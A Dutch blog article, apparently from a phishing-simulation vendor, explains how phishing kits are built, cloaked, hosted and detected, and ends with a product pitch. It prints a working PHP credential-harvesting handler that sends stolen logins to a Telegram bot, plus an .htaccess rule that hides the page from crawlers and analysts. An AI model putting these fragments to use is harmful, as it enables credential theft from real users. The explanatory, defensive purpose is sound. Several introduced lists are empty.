← Alle artikelen

Anatomie van een moderne phishingkit

GottaPhish Team · April 22, 2026

Een «phishingkit» is de verpakte, herbruikbare codebasis die aanvallers uitrollen om een inlogpagina te klonen, inloggegevens te oogsten en te exfiltreren. Begrijpen hoe deze kits zijn gebouwd — en hoe ze zich verbergen — maakt het veel makkelijker om campagnes vroeg te detecteren en overtuigende defensieve simulaties te bouwen.

Wat er in een kit zit

Een typische kit is een ZIP-archief dat op een gekaapte host of goedkope hosting wordt gezet. De structuur is opvallend constant:

kit/
├── index.php            # de gekloonde landingspagina
├── login.php            # formulierverwerker: vangt + stuurt inloggegevens door
├── assets/              # pixelgetrouwe kopieën van CSS, JS, logo's, lettertypen
├── config.php           # exfiltratiedoel (e-mail, Telegram-bot, externe URL)
├── antibots.php         # bloklijsten voor crawlers, sandboxes, onderzoekers
└── .htaccess            # rewrites, geo-/IP-filtering, hotlinkbescherming

Moderne kits worden steeds vaker «als dienst» verkocht (PhaaS — Phishing-as-a-Service), compleet met abonnementsdashboards, updates en support.

De kloon

De landingspagina is meestal een byte-voor-byte kopie van een echt inlogscherm, vastgelegd met een site-ripper of een headless browser. Twee kenmerken komen vaak voor:

Geavanceerde kits proxyen de echte site in realtime (een adversary-in-the-middle-opzet met tools als Evilginx), leiden de invoer van het slachtoffer door naar de echte server en stelen de resulterende sessiecookie — wat de meeste MFA verslaat.

Anti-analyselaag

Het antibots-onderdeel houdt een kit in leven. Het filtert bezoekers voordat de phishingpagina wordt geserveerd:

# .htaccess-fragment
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]

Daarom was een URL die voor een SOC-analist «dood lijkt», minuten eerder volledig live voor het slachtoffer.

Inloggegevens vangen en exfiltreren

De verwerker valideert net genoeg om echt te lijken en verstuurt dan de data. Exfiltratiekanalen, grofweg op populariteit:

$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");

Let op de laatste redirect: na het «mislukte inloggen» belandt het slachtoffer op de echte site, denkt aan een typfout, logt succesvol in en vermoedt niets.

Hosting en aflevering

Kits geven de voorkeur aan wegwerpinfrastructuur: gekaapte WordPress-sites, open redirects op vertrouwde domeinen, net geregistreerde gelijkende domeinen en steeds vaker legitieme diensten (Cloudflare Workers, IPFS, SharePoint, Google Docs) om hun reputatie te lenen. De aflevering koppelt de kit aan lokaas — een factuur, een MFA-«herverificatie», een melding van een gedeeld document.

Defensieve detectie

Signalen die het jagen waard zijn:

De ongemakkelijke waarheid: een goed gebouwde AiTM-kit verslaat MFA via sms en app door het sessietoken te stelen. Phishingbestendige methoden — FIDO2 / passkeys — zijn de duurzame oplossing.

Hoe GottaPhish helpt

Moderne phishingkits maken wapens van pixelgetrouwe klonen en AiTM-sessiediefstal die zelfs MFA via sms en app verslaan. GottaPhish en zijn expertteam helpen u precies die dreiging te weerstaan: veilige, volledig gecontroleerde simulaties die echte kits weerspiegelen — getokeniseerde links, credential-capture-flows, AiTM-scenario's — met dashboards die tonen welk lokaas aanslaat en waar MFA standhoudt. Onze experts begeleiden de inrichting, ontwerpen scenario's die het huidige PhaaS-vakmanschap nabootsen en helpen de resultaten te duiden als gerichte training en als concrete detection-engineering-signalen voor uw SOC.